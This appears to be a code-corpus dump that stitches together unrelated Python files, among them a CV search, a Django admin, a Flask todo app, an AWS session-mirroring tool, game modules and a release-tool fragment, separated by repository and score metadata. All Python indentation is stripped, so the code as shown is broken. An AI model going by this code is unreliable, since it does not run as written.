text = str(remove_quote(text))
text = str(remove_special_quote(text))
text = str(remove_multiple_space(text))
text_tokens.append(snowBallStemmer.stem(text))
text_tokens = [text for text in text_tokens if len(text)>2]
return text_tokens
def calcul_similarity(word1,word2,model):
arr1 = model.wv[word1].reshape(1, -1)
arr2 = model.wv[word2].reshape(1, -1)
return cosine_similarity(arr1,arr2)[0][0]
def recherche(query,competences,model,CVs,TopK):
similarite=np.zeros(len(competences))-1
for i,comp in enumerate(competences):
comp=transformation(comp)
a=0
for word in query:
similarite_word=np.zeros(len(comp))-1
for c,word1 in enumerate(comp):
try:
#similarite_word[c]=model.similarity(word,word1)
similarite_word[c]=calcul_similarity(word,word1,model)
except KeyError:
continue
a+=np.max(similarite_word)
similarite[i]=a/len(query)
topc=np.argsort(similarite)[::-1][:TopK]
result = []
for i in range(TopK):
cand = {
"candidat": CVs[topc[i]],
"resultat": "{0:.2f}".format(similarite[topc[i]])
}
result.append(cand)
return result
## get word2vec for each sentences by using average word embeddings
def word2vec_sentence_embedding(reviews_unigram,model,model_size):
#print(reviews_unigram)
arr = np.array([0.0 for i in range(0, model_size)])
for index, word_list in enumerate(reviews_unigram):
#print(word_list)
try:
arr += model.wv[word_list]
except KeyError:
continue
if(len(reviews_unigram) == 0):
dict_word2vec = arr
else:
dict_word2vec = arr / len(reviews_unigram)
df_word2vec = pd.DataFrame(dict_word2vec).T
return df_word2vec
def get_sent_embs(sentences_trans,emb_model,model_size,tfidf):
sent_embs = []
for desc in range(len(sentences_trans)):
#print(desc)
if len(sentences_trans[desc]) > 0:
#print(desc)
sent_emb = np.zeros((1, model_size))
div = 0
sentence_trans_tfidf=tfidf.transform([' '.join(sentences_trans[desc])]).todense()
sentence_trans_tfidf=pd.DataFrame(sentence_trans_tfidf, columns=tfidf.get_feature_names())
for word in sentences_trans[desc]:
#print(word)
if word in emb_model.wv.key_to_index:
word_emb = emb_model.wv[word]
weight = sentence_trans_tfidf[word][0]
#print(word,weight)
sent_emb = np.add(sent_emb, word_emb * weight)
div += weight
else:
div += 1e-13 #to avoid dividing by 0
sent_emb = np.divide(sent_emb, div)
sent_embs.append(sent_emb.flatten())
return sent_embs
def recherche_offre(offre,cv,CVs,TopK):
similarite=np.zeros(len(cv))-1
for i,c in enumerate(cv):
similarite[i]=np.mean(np.max(cosine_similarity(offre,cv[i]),axis=1))
topc=np.argsort(similarite)[::-1][:TopK]
result = []
for i in range(TopK):
cand = {
"candidat": CVs[topc[i]],
"resultat": "{0:.2f}".format(similarite[topc[i]])
}
result.append(cand)
return result | 1.929688 | 2 |
config/admin.py | 2019342a/improved-enigma | 0 | 12789288 | <gh_stars>0
from django.contrib import admin
class SkorAdmin(admin.AdminSite):
site_title = "Skor"
site_header = "Skor"
index_title = "Skor administration"
site_url = None
| 1.3125 | 1 |
datasets/nmr_wine/__init__.py | ryuzakyl/data-bloodhound | 3 | 12789289 | #!/usr/bin/env
# -*- coding: utf-8 -*-
# Copyright (C) <NAME> - All Rights Reserved
# Unauthorized copying of this file, via any medium is strictly prohibited
# Proprietary and confidential
# Written by <NAME> <<EMAIL>>, January 2017
import os
import numpy as np
import pandas as pd
import scipy.io as sio
import utils.datasets as utils
# ---------------------------------------------------------------
# data set paths
__data_path = "{}/data/NMR_40wines.mat".format(os.path.split(__file__)[0])
__pickle_path = "{}/cache/nmr_wine.pickle".format(os.path.split(__file__)[0])
# ---------------------------------------------------------------
# TODO: Add docstring with usage examples (see 'uv_fuel' data set)
@utils.load_data_from_pickle(__pickle_path)
def load_nmr_wines():
"""Loads the NMR Wines data set.
Returns:
A Pandas DataFrame with all the data set info.
Examples:
>>> ds = load_nmr_wines()
>>> ds['wine_data'].shape
(40, 8729)
>>> ds['wine_ints'].shape
(22, 1)
"""
# loading matlab data set object
raw_data = sio.loadmat(__data_path)
# validating loaded data
if raw_data is None:
raise Exception('Error while loading 1H-NMR Wines data.')
# getting features labels
features_labels = raw_data['ppm'][0].tolist()
# getting properties labels
props_labels = list(map(lambda x: x[0], raw_data['Label'][0]))
# getting samples data
data = raw_data['X']
# getting properties data
props_data = raw_data['Y']
# creating the wine data set
all_data = np.hstack([data, props_data])
all_labels = range(all_data.shape[0])
all_features = features_labels + props_labels
wine_ds = utils.build_data_set(all_data.tolist(), all_labels, all_features)
# ----------------------
wine_ints_data = raw_data['wine_ints'][0]
wine_ints_ds = pd.DataFrame(wine_ints_data)
# ----------------------
# the final data set
ds = {
'wine_data': wine_ds,
'wine_ints': wine_ints_ds,
}
# returning the final data set
return ds
| 2.578125 | 3 |
footer/menus/__init__.py | AutomataRaven/azaharTEA | 5 | 12789290 | __all__ = ['highlightmenu.HighlightMenu','highlightmenu.HighligthStyleMenu']
| 1.101563 | 1 |
run_game.py | hdaftary/Flappy-Birds | 0 | 12789291 | import pygame
import flappy
from thread import callback
import speech_recognition as sr
import sys
if __name__ == '__main__':
if len(sys.argv) == 3 and sys.argv[2] == "False":
r = sr.Recognizer()
m = sr.Microphone()
with m as source:
r.adjust_for_ambient_noise(source) # we only need to calibrate once, before we start listening
# start listening in the background (note that we don't have to do this inside a `with` statement)
stop_listening = r.listen_in_background(m, callback)
pygame.init() # initialize pygame
pygame.display.set_caption('Flappy Birds For Handicapped People')
flappy.play_game()
| 3.140625 | 3 |
aws_network_tap/tap.py | vectranetworks/AWS-Session-Mirroring-Tool | 3 | 12789292 | <gh_stars>1-10
"""
AWS Network Tapping Tool
For installing AWS Session Mirroring on Eligible Nitro instances.
Took takes a "tap everything" approach at the VPC level.
Specific instances can be opted out with the blacklist tool.
"""
import logging
from aws_network_tap.models.ec2_api_client import Ec2ApiClient, VPC_Props
from aws_network_tap.models.spile_tapper import SpileTapper
from aws_network_tap.models.tag_config import VPCTagConfig
def main() -> None:
logging.getLogger().setLevel(logging.INFO)
region = Ec2ApiClient.get_region()
for vpc_prop in Ec2ApiClient.list_vpcs(region=region): # type: VPC_Props
logging.info(f" Managing Session Mirroring for VPC {vpc_prop.name}: {vpc_prop.vpc_id}")
config = VPCTagConfig(vpc_prop.tags)
SpileTapper.manage(region=region, vpc_ids=[vpc_prop.vpc_id], config=config)
if __name__ == "__main__":
main()
| 2 | 2 |
credoscript/contrib/chemblws.py | tlb-lab/credoscript | 0 | 12789293 | <gh_stars>0
import json
from urllib import urlencode
from urllib2 import quote, urlopen, HTTPError, URLError
class ChEMBLWS(object):
'''
'''
def __init__(self):
'''
'''
self._url = "https://www.ebi.ac.uk/chemblws/{entity}/{target}/{query}.json"
def _get_instance(self, entity, target, query):
"""
"""
url = self._url.format(entity=entity, target=target, query=query)
try:
response = urlopen(url)
except HTTPError, error:
raise error
else:
return json.loads(response.read())
def compound_bioactivities(self, chembl_id):
"""
Get individual compound bioactivities
"""
return self._get_instance('compounds', chembl_id, 'bioactivities') | 3.125 | 3 |
baekjoon/python/complete_binary_tree_3038.py | yskang/AlgorithmPracticeWithPython | 0 | 12789294 | <gh_stars>0
# Title: 완전 이진 트리
# Link: https://www.acmicpc.net/problem/3038
import sys
sys.setrecursionlimit(10 ** 6)
read_single_int = lambda: int(sys.stdin.readline().strip())
def f(x: int, y: int, n: int):
if y == (1 << n - 1):
print(y*3-1-x)
return
print(x)
f(x+y, y*2, n)
f(x+y*2, y*2, n)
def solution(n: int):
f(1, 1, n)
def main():
n = read_single_int()
solution(n)
if __name__ == '__main__':
main() | 3.21875 | 3 |
xls/solvers/python/lec_characterizer_test.py | ted-xie/xls | 0 | 12789295 | <filename>xls/solvers/python/lec_characterizer_test.py
# Lint as: python3
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for xls.solvers.lec_characterizer."""
import os
import tempfile
import portpicker
from google.protobuf import text_format
from absl.testing import absltest
from xls.common import gfile
from xls.common import runfiles
from xls.ir import op_pb2
from xls.ir import xls_type_pb2
from xls.ir.python import package
from xls.solvers.python import lec_characterizer
from xls.solvers.python import lec_characterizer_pb2
class LecCharacterizerTest(absltest.TestCase):
_CELL_LIBRARY_PATH = 'xls/netlist/fake_cell_library.textproto'
def setUp(self):
super().setUp()
server_path = runfiles.get_path('xls/synthesis/dummy_synthesis_server_main')
self.port = portpicker.pick_unused_port()
self.lc = lec_characterizer.LecCharacterizer(
[server_path, '--port={}'.format(self.port)], self.port)
cell_lib_path = runfiles.get_path(self._CELL_LIBRARY_PATH)
with gfile.open(cell_lib_path, 'r') as f:
self.cell_lib_text = f.read()
def tearDown(self):
super().tearDown()
portpicker.return_port(self.port)
# Smoke test showing we're able to generate IR/netlist sources.
def test_generates_sources(self):
p = package.Package('the_package')
ir_text, netlist_text = self.lc._generate_sources(
op_pb2.OpProto.OP_ADD,
[p.get_bits_type(8), p.get_bits_type(8)], p.get_bits_type(8))
self.assertIn('ret add.1: bits[8]', ir_text)
self.assertEqual(netlist_text, '// NETLIST')
# Tests that an extremely simple case runs without exploding.
def test_lec_smoke(self):
p = package.Package('the_package')
temp_dir = tempfile.TemporaryDirectory()
results_path = os.path.join(temp_dir.name, 'results.textproto')
num_iters = 16
byte_type = p.get_bits_type(8)
self.lc.run(
op=op_pb2.OpProto.OP_ADD,
samples=[([byte_type, byte_type], byte_type)],
num_iters=num_iters,
cell_library_textproto=self.cell_lib_text,
results_path=results_path,
lec_fn=lambda a, b, c, d: True)
# Open results, verify contents
results = lec_characterizer_pb2.LecTiming()
with gfile.open(results_path, 'r') as f:
text_format.Parse(f.read(), results)
self.assertEqual(results.ir_function, 'single_op_OP_ADD')
self.assertLen(results.test_cases, 1)
test_case = results.test_cases[0]
self.assertLen(test_case.exec_times_us, num_iters)
# Tests that we can correctly append to a preexisting proto file.
def test_read_then_write(self):
p = package.Package('the_package')
temp_dir = tempfile.TemporaryDirectory()
results_path = os.path.join(temp_dir.name, 'results.textproto')
results = lec_characterizer_pb2.LecTiming()
results.ir_function = 'single_op_OP_ADD'
# Add one un-touched test case, and add one that should be appended to.
proto_byte = xls_type_pb2.TypeProto()
proto_byte.type_enum = xls_type_pb2.TypeProto.BITS
proto_byte.bit_count = 8
proto_short = xls_type_pb2.TypeProto()
proto_short.type_enum = xls_type_pb2.TypeProto.BITS
proto_short.bit_count = 16
test_case = results.test_cases.add()
param = test_case.function_type.parameters.add()
param.CopyFrom(proto_short)
param = test_case.function_type.parameters.add()
param.CopyFrom(proto_short)
test_case.function_type.return_type.CopyFrom(proto_short)
test_case = results.test_cases.add()
param = test_case.function_type.parameters.add()
param.CopyFrom(proto_byte)
param = test_case.function_type.parameters.add()
param.CopyFrom(proto_byte)
test_case.function_type.return_type.CopyFrom(proto_byte)
test_case.exec_times_us.extend([1, 3, 7])
test_case.average_us = 3
with gfile.open(results_path, 'w') as f:
f.write(text_format.MessageToString(results))
num_iters = 16
byte_type = p.get_bits_type(8)
self.lc.run(
op=op_pb2.OpProto.OP_ADD,
samples=[([byte_type, byte_type], byte_type)],
num_iters=num_iters,
cell_library_textproto=self.cell_lib_text,
results_path=results_path,
lec_fn=lambda a, b, c, d: True)
results = lec_characterizer_pb2.LecTiming()
with gfile.open(results_path, 'r') as f:
text_format.Parse(f.read(), results)
self.assertEqual(results.ir_function, 'single_op_OP_ADD')
self.assertLen(results.test_cases, 2)
for test_case in results.test_cases:
if test_case.function_type.return_type.bit_count == 16:
self.assertEmpty(test_case.exec_times_us)
else:
self.assertLen(test_case.exec_times_us, 3 + num_iters)
if __name__ == '__main__':
absltest.main()
| 2.3125 | 2 |
banking/utils.py | justmytwospence/banking-oop | 0 | 12789296 | <filename>banking/utils.py
import logging
logger = logging.getLogger(__name__)
def split_name(name):
try:
names = name.split(" ")
assert len(names) == 2
return names[0], names[1]
except Exception as e:
logger.error(f"Only one first and last name supported.")
return None
| 3.1875 | 3 |
basad.py | qitianchan/new-busad | 0 | 12789297 | <filename>basad.py
# -*- coding: utf-8 -*-
from flask import Flask, blueprints, url_for
from extentions import db, login_manager
from views import auth_blueprint, busad_blueprint
from models import User
def create_app():
app = Flask(__name__)
# app config
app.config.from_object('config.DefaultConfig')
_init_extention(app)
_register_blueprint(app)
with app.app_context():
# create database
db.create_all()
return app
def _init_extention(app):
"""
extention initial
:param app:
:return:
"""
db.init_app(app)
# login_manager
login_manager.init_app(app)
login_manager.login_view = 'auth_blueprint.login'
@login_manager.user_loader
def load_user(user_id):
return User.get(user_id)
def _register_blueprint(app):
"""
:param app:
:return:
"""
app.register_blueprint(auth_blueprint)
app.register_blueprint(busad_blueprint)
if __name__ == '__main__':
app = create_app()
app.run(port=8001) | 2.359375 | 2 |
example_motion_sensor_gesture_data.py | coldppc/kpk | 0 | 12789298 | '''
This example will print the gesture name
'''
from communitysdk import list_connected_devices, MotionSensorKit
devices = list_connected_devices()
msk_filter = filter(lambda device: isinstance(device, MotionSensorKit), devices)
msk = next(msk_filter, None) # Get first Motion Sensor Kit
if msk == None:
print('No Motion Sensor was found :(')
else:
def on_gesture(gestureValue):
print('Gesture detected:', gestureValue)
try:
msk.set_mode('gesture')
except Exception as e:
print(e)
msk.on_gesture = on_gesture
print('Wave your hand above the Motion Sensor:')
| 3.265625 | 3 |
container/src/models/note.py | PowercoderJr/oonote | 0 | 12789299 | <gh_stars>0
from app import db
class Note(db.Model):
id_ = db.Column(db.String(16), primary_key=True)
text = db.Column(db.Text)
response = db.Column(db.String(100))
created_at = db.Column(db.DateTime)
read_at = db.Column(db.DateTime)
password = db.Column(db.String(64))
| 2.078125 | 2 |
flasktodo/todos.py | blong191/flask-todo | 0 | 12789300 | <filename>flasktodo/todos.py<gh_stars>0
from flask import Blueprint, render_template, request
from . import db
bp = Blueprint("todos", __name__)
@bp.route("/", methods=("GET", "POST"))
def index():
"""View for home page which shows list of to-do items."""
conn = db.get_db()
cur = conn.cursor()
cur.execute('SELECT * FROM todos')
print(request.form)
if request.method == 'POST':
#Put in additional tasks the user wants
description = request.form['description']
completed = request.form.get('completed')
uncompleted = request.form.get('uncompleted')
all = request.form.get('all')
if description != None:
#Add a new task
cur.execute(
'INSERT INTO todos (description, completed, created_at) VALUES (%s, FALSE, CURRENT_TIMESTAMP)',
(description,)
)
#Make sure the new task is reconized by cur
cur.execute('SELECT * FROM todos')
if uncompleted != None or completed != None:
#Checks for which submit was pushed
if uncompleted != None:
cur.execute('SELECT * FROM todos WHERE completed = FALSE')
else:
cur.execute('SELECT * FROM todos WHERE completed = TRUE')
conn.commit()
#if a button(submit) is pressed, show only certain tasks, completed, uncompleted, or all
todos = cur.fetchall()
cur.close()
return render_template("index.html", todos=todos)
[1, 2]
(1,)
| 2.96875 | 3 |
src/collective/eeafaceted/z3ctable/tests/vocabularies.py | collective/collective.eeafaceted.z3ctable | 1 | 12789301 | # encoding: utf-8
from zope.interface import implements
from zope.schema.vocabulary import SimpleVocabulary
from zope.schema.interfaces import IVocabularyFactory
from zope.schema.vocabulary import SimpleTerm
from plone.memoize.instance import memoize
class TestingVocabulary(object):
implements(IVocabularyFactory)
@memoize
def __call__(self, context):
""" """
res = []
res.append(SimpleTerm('existing_key1', 'existing_key1', 'Existing v\xc3\xa9lue 1'))
res.append(SimpleTerm('existing_key2', 'existing_key2', 'Existing v\xc3\xa9lue 2'))
res.append(SimpleTerm('existing_key3', 'existing_key3', 'Existing v\xc3\xa9lue 3'))
return SimpleVocabulary(res)
TestingVocabularyFactory = TestingVocabulary()
class TestingFullVocabulary(object):
implements(IVocabularyFactory)
@memoize
def __call__(self, context):
""" """
res = []
res.append(SimpleTerm('existing_key1', 'existing_key1', 'Full existing value 1'))
res.append(SimpleTerm('existing_key2', 'existing_key2', 'Full existing value 2'))
res.append(SimpleTerm('existing_key3', 'existing_key3', 'Full existing value 3'))
return SimpleVocabulary(res)
TestingFullVocabularyFactory = TestingFullVocabulary()
| 2.125 | 2 |
oops_fhir/r4/value_set/related_artifact_type.py | Mikuana/oops_fhir | 0 | 12789302 | <filename>oops_fhir/r4/value_set/related_artifact_type.py
from pathlib import Path
from fhir.resources.valueset import ValueSet as _ValueSet
from oops_fhir.utils import ValueSet
from oops_fhir.r4.code_system.related_artifact_type import (
RelatedArtifactType as RelatedArtifactType_,
)
__all__ = ["RelatedArtifactType"]
_resource = _ValueSet.parse_file(Path(__file__).with_suffix(".json"))
class RelatedArtifactType(RelatedArtifactType_):
"""
RelatedArtifactType
The type of relationship to the related artifact.
Status: draft - Version: 4.0.1
http://hl7.org/fhir/ValueSet/related-artifact-type
"""
class Meta:
resource = _resource
| 1.953125 | 2 |
Project/pix2pix_dense/loss.py | Kaustubh1Verma/CS671_Deep-Learning_2019 | 0 | 12789303 | <filename>Project/pix2pix_dense/loss.py
from tensorflow.python.keras.models import Sequential
from tensorflow.python.keras.layers.core import Flatten, Dense, Dropout
from tensorflow.python.keras.layers.convolutional import Convolution2D, MaxPooling2D, ZeroPadding2D
from tensorflow.python.keras.optimizers import SGD
import cv2
from tensorflow.python.keras.applications import VGG19
import tensorflow as tf
from tensorflow.python.keras.preprocessing import image
from tensorflow.python.keras.models import Model
import numpy as np
import matplotlib.pyplot as plt
import tensorflow.python.keras.backend as k
model=VGG19(weights="vgg19_weights_tf_dim_ordering_tf_kernels_notop.h5",include_top=False)
model_extractfeatures = Model(input=model.input, output=model.get_layer('block4_pool').output)
def feature_extract(x):
fc2_features = model_extractfeatures.predict(x)
return fc2_features
def preprocess(img):
cv2.resize(img,(224,224))
x = image.img_to_array(img)
x = np.expand_dims(x, axis=0)
x = preprocess_input(x)
return x
def smooth_L1_loss(y_true, y_pred):
return tf.losses.huber_loss(y_true, y_pred)
def total_loss(y_true, y_pred):
# img1=image.load_img(y_true_path, target_size=(224, 224))
# img2=image.load_img(y_pred_path, target_size=(224, 224))
f1=preprocess(y_true)
f2=preprocess(y_pred)
fx1=feature_extract(f1)
fx2=feature_extract(f2)
loss1 = tf.reduce_mean(tf.squared_difference(fx1, fx2))
loss2=smooth_L1_loss(y_true,y_pred)
return k.eval(loss1),k.eval(loss2) | 2.625 | 3 |
code-files/frosch2010_Tabu_settings.py | Frosch2010/discord-tabu | 2 | 12789304 | class tabu_settings:
tabu_channelID_join = None
tabu_channelID_team_1 = None
tabu_channelID_team_2 = None
tabu_channelID_add_terms = None
tabu_channelID_bot_admin = None
tabu_bot_token = None
tabu_server_ID = None
tabu_default_save_terms = True
tabu_save_after_game = True
tabu_save_after_auto_add = True
tabu_default_points_to_win = 200
tabu_round_lenght = 60
tabu_switching_lenght = 10
tabu_min_players = 4
tabu_message_auto_delete = 10
tabu_revenge_time = 30
tabu_same_chance = True | 1.359375 | 1 |
tester.py | jpypi/Multitron | 1 | 12789305 | #!/usr/bin/env python3
import numpy as np
import pickle
from PIL import Image
w = pickle.load(open("weights1000.pkl", "rb"))
def Classify(example):
return w.dot(example)
#Seems to get 2, 3, 4 correct...
for i in range(0, 5):
image = Image.open("test_images/{}.jpg".format(i)).convert("L")
x = np.asarray(image.getdata())
x = (255 - x)/255
x = np.r_[x, 1]
y = Classify(x)
print(y)
print("Actual: {} Classification: {}".format(i, np.argmax(y)))
| 3.046875 | 3 |
tests/test_equality.py | calebmarcus/awacs | 0 | 12789306 | import unittest
from awacs import s3, ec2, iam
from awacs.aws import PolicyDocument, Statement, Action, Condition
from awacs.aws import StringEquals, StringLike
class TestEquality(unittest.TestCase):
def test_condition_equality(self):
self.assertEqualWithHash(
Condition(StringLike("s3:prefix", ["home/${aws:username}/*"])),
Condition(StringLike("s3:prefix", ["home/${aws:username}/*"])))
self.assertNotEqualWithHash(
Condition(StringLike("s3:prefix", ["home/${aws:username}/*"])),
Condition(StringLike("s3:prefix", ["other/${aws:username}/*"])))
self.assertNotEqualWithHash(
Condition(StringLike("s3:prefix", ["home/${aws:username}/*"])),
Condition(StringEquals("s3:prefix", ["home/${aws:username}/*"])))
def test_arn_equality(self):
self.assertEqualWithHash(
s3.ARN("myBucket"), s3.ARN("myBucket"))
self.assertNotEqualWithHash(
s3.ARN("myBucket"), s3.ARN("myOtherBucket"))
self.assertEqualWithHash(
ec2.ARN("some-resource", "some-region", "some-account"),
ec2.ARN("some-resource", "some-region", "some-account"))
self.assertNotEqualWithHash(
ec2.ARN("some-resource", "some-region", "some-account"),
ec2.ARN("some-resource", "some-other-region", "some-account"))
self.assertNotEqualWithHash(
ec2.ARN("some-resource", "some-region", "some-account"),
iam.ARN("some-resource", "some-region", "some-account"))
def test_action_equality(self):
self.assertEqualWithHash(
Action('autoscaling', 'DescribeLaunchConfigurations'),
Action('autoscaling', 'DescribeLaunchConfigurations'))
self.assertNotEqualWithHash(
Action('autoscaling', 'DescribeLaunchConfigurations'),
Action('ec2', 'DescribeInstances'))
def test_statement_equality(self):
one = Statement(
Effect="Allow",
Action=[
Action('autoscaling', 'DescribeLaunchConfigurations'),
],
Resource=["*"]
)
one_again = Statement(
Effect="Allow",
Action=[
Action('autoscaling', 'DescribeLaunchConfigurations'),
],
Resource=["*"]
)
two = Statement(
Effect="Allow",
Action=[
Action('ec2', 'DescribeInstances'),
],
Resource=["*"]
)
self.assertEqualWithHash(one, one_again)
self.assertNotEqualWithHash(one, two)
def test_policy_document_equality(self):
one = PolicyDocument(
Version="2012-10-17",
Statement=[
Statement(
Effect="Allow",
Action=[
Action('autoscaling', 'DescribeLaunchConfigurations'),
],
Resource=["*"]
)
]
)
one_again = PolicyDocument(
Version="2012-10-17",
Statement=[
Statement(
Effect="Allow",
Action=[
Action('autoscaling', 'DescribeLaunchConfigurations'),
],
Resource=["*"]
)
]
)
two = PolicyDocument(
Version="2012-10-17",
Statement=[
Statement(
Effect="Allow",
Action=[
Action('ec2', 'DescribeInstances'),
],
Resource=["*"]
)
]
)
self.assertEqualWithHash(one, one_again)
self.assertNotEqualWithHash(one, two)
def assertEqualWithHash(self, one, two):
self.assertTrue(one == two)
self.assertEqual(hash(one), hash(two))
def assertNotEqualWithHash(self, one, two):
self.assertTrue(one != two)
self.assertNotEqual(hash(one), hash(two))
| 2.890625 | 3 |
tickets/migrations/0001_initial.py | mcm66103/ez-django | 1 | 12789307 | <reponame>mcm66103/ez-django<filename>tickets/migrations/0001_initial.py
# Generated by Django 2.2.13 on 2021-02-25 00:30
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
('websites', '0001_initial'),
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Ticket',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now=True)),
('updated_at', models.DateTimeField(auto_now=True)),
('status', models.CharField(choices=[('new', 'New'), ('in progress', 'In Progress'), ('ready for deployment', 'Ready For Deployment'), ('complete', 'Complete'), ('rejected', 'Rejected')], default='new', max_length=48)),
('name', models.CharField(max_length=128)),
('description', models.TextField()),
('owner', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='owner', to=settings.AUTH_USER_MODEL)),
('website', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='websites.Website')),
('worker', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='worker', to=settings.AUTH_USER_MODEL)),
],
options={
'abstract': False,
},
),
]
| 1.617188 | 2 |
python-app/app/services/query.py | jnplonte/flask-api | 1 | 12789308 | <filename>python-app/app/services/query.py
def query(data):
finalQuery = {}
query = data.split('|')
if len(query) >= 1:
for qData in query:
if (qData.find(':') != -1):
qDataFinal = qData.split(':')
if (qDataFinal[1].find(',') != -1):
arrQDataFinal = {'$in': qDataFinal[1].split(',')}
else:
arrQDataFinal = qDataFinal[1]
finalQuery[qDataFinal[0]] = arrQDataFinal
return finalQuery | 2.859375 | 3 |
src/primaires/scripting/actions/changer_prix.py | vlegoff/tsunami | 14 | 12789309 | # -*-coding:Utf-8 -*
# Copyright (c) 2010-2017 <NAME>
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# * Neither the name of the copyright holder nor the names of its contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT
# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
"""Fichier contenant l'action changer_prix."""
from primaires.scripting.action import Action
from primaires.scripting.instruction import ErreurExecution
class ClasseAction(Action):
"""Change le prix de l'objet ou de son prototype."""
@classmethod
def init_types(cls):
cls.ajouter_types(cls.changer_prix, "Objet", "Fraction")
cls.ajouter_types(cls.changer_prix, "PrototypeObjet", "Fraction")
@staticmethod
def changer_prix(prototype_ou_objet, prix):
"""Change le prix de l'objet ou du prototype précisé.
Le prix modifié est à donner en valeur 1 (la plus petite
monnaie disponible). Il s'agit donc d'une modification
dans la même unité que dans l'éditeur d'objet 'oedit'.
Paramètres à préciser :
* prototype_ou_objet : l'objet dont on veut changer le prix
* prix : le nouveau prix
Exemple d'utilisation :
changer_prix objet 10
"""
prototype_ou_objet._prix = int(prix)
| 1.53125 | 2 |
bot/urls.py | GautamPanickar/PanikarsBot | 1 | 12789310 | <reponame>GautamPanickar/PanikarsBot
from django.conf.urls import url
from . import views
urlpatterns = [
url(r'^$', views.index, name='index'),
url(r'^submit', views.submit, name='submit'),
]
# a dummy method for making db operations newboston video tutorial
#url(r'^(?P<message_id>[0-9]+)/$', views.details, name='details'),
| 1.820313 | 2 |
swd/military_track.py | dfomin/7wd-engine | 0 | 12789311 | <reponame>dfomin/7wd-engine
from typing import Callable, Optional
import numpy as np
from .states.military_state_track import MilitaryTrackState
class MilitaryTrack:
@staticmethod
def apply_shields(state: MilitaryTrackState,
player_index: int,
shields: int,
military_tokens_callback: Callable[[int, int], None]):
if player_index == 1:
shields = -shields
state.conflict_pawn = np.clip(state.conflict_pawn + shields, -9, 9)
if state.conflict_pawn >= 3 and state.military_tokens[2]:
state.military_tokens[2] = False
military_tokens_callback(1, -2)
if state.conflict_pawn >= 6 and state.military_tokens[3]:
state.military_tokens[3] = False
military_tokens_callback(1, -5)
if state.conflict_pawn <= -3 and state.military_tokens[1]:
state.military_tokens[1] = False
military_tokens_callback(0, -2)
if state.conflict_pawn <= -6 and state.military_tokens[0]:
state.military_tokens[0] = False
military_tokens_callback(0, -5)
@staticmethod
def military_supremacist(state: MilitaryTrackState) -> Optional[int]:
if state.conflict_pawn == 9:
return 0
elif state.conflict_pawn == -9:
return 1
return None
@staticmethod
def weaker_player(state: MilitaryTrackState) -> Optional[int]:
if state.conflict_pawn > 0:
return 1
elif state.conflict_pawn < 0:
return 0
return None
@staticmethod
def points(state: MilitaryTrackState, player_index: int) -> int:
if MilitaryTrack.military_supremacist(state) is not None:
return 0
if player_index == 0 and state.conflict_pawn <= 0 or player_index == 1 and state.conflict_pawn >= 0:
return 0
return [2, 5, 10][abs(state.conflict_pawn) // 3]
| 2.390625 | 2 |
release-assistant/javcra/application/modifypart/modifyentrance.py | openeuler-mirror/release-tools | 1 | 12789312 | #!/usr/bin/python3
# ******************************************************************************
# Copyright (c) Huawei Technologies Co., Ltd. 2020-2020. All rights reserved.
# licensed under the Mulan PSL v2.
# You can use this software according to the terms and conditions of the Mulan PSL v2.
# You may obtain a copy of Mulan PSL v2 at:
# http://license.coscl.org.cn/MulanPSL2
# THIS SOFTWARE IS PROVIDED ON AN "AS IS" BASIS, WITHOUT WARRANTIES OF ANY KIND, EITHER EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO NON-INFRINGEMENT, MERCHANTABILITY OR FIT FOR A PARTICULAR
# PURPOSE.
# See the Mulan PSL v2 for more details.
# ******************************************************************************/
"""
Description: modify entrance
"""
import datetime
import json
import re
import requests
from retrying import retry
from javcra.api.gitee_api import Issue
from javcra.common.constant import REPO_BASE_URL, RELEASE_URL
from javcra.libs.log import logger
from javcra.libs.read_excel import download_file
class Operation(Issue):
"""
md operation for release issue description
"""
def init_md_table(self, t_head=None, body_info=None, block_title="", prefix="", suffix=""):
"""
initialize the md table of specific part like "CVE part" for release issue
Args:
t_head: table head. e.g.["CVE", "仓库", "status"]
body_info: table body
block_title: title of block. e.g: "## 1.CVE"
prefix: table prefix. e.g.: "修复cve xx 个"
suffix: characters between the end of the table and the next block.
Raises:
ValueError: The thead must be a list or tuple
Returns:
str: markdown table str
"""
if not t_head:
t_head = []
